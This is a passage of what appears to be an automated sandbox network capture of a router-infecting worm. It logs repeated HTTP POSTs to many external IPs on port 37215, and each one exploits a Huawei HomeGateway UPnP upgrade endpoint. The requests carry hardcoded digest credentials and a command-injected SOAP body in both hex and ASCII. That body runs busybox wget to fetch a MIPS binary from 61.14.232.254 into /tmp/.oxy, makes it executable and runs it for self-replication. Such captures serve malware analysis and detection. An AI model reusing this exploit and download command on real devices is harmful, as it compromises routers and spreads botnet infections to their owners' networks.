69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  98192.168.2.1355278222.35.243.9437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653964043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  99192.168.2.1345538197.240.50.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653964043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  100192.168.2.1350424197.229.25.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653970003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  101192.168.2.1348524157.204.251.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653990030 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  102192.168.2.135716441.111.94.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654050112 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  103192.168.2.1339214197.1.234.22137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654078007 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  104192.168.2.1346692197.211.195.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654119968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  105192.168.2.135636241.75.196.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654120922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  106192.168.2.1344850197.82.16.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654120922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  107192.168.2.1337892197.22.120.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654143095 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  108192.168.2.133740641.253.115.19637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.654191971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
